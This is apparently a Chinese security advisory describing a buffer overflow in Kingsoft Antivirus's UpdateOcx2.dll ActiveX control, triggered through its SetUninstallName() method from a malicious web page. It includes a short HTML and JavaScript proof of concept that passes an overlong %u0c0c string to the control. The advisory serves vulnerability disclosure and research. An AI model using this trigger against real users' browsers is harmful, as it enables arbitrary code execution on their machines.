Kingsoft Antivirus Online Update Module是一款反病毒在线升级模块。
Kingsoft Antivirus在线升级模块包含的ActiveX控件不正确处理用户提交的参数数据,远程攻击者可以利用漏洞以应用程序进程权限执行任意指令。
问题存在于C:/WINDOWS/system32/KingSoft/KOS/UpdateOcx2.dll控件对SetUninstallName()方法的处理中,构建超长字符串作为SetUninstallName()方法参数数据,并诱使用户访问恶意WEB页,可导致触发缓冲区溢出,可能以应用程序进程权限执行任意指令。
| 测试方法: [警 告] 以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负! ----------------------------------------------------------------------------------- <object classid='clsid:D82303B7-A754-4DCB-8AFC-8CF99435AACE' id='target1'></object> <object classid='clsid:D82303B7-A754-4DCB-8AFC-8CF99435AACE' id='target2'></object> <script> var str1 = ""; while (str1.length < 914) { str1 += unescape("%u0c0c"); } target1.SetUninstallName(str1); </script> ----------------------------------------------------------------------------------- | |
| 建议: 目前没有解决方案提供: http://en.kingsoft.com/ |
扫一扫
3441
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
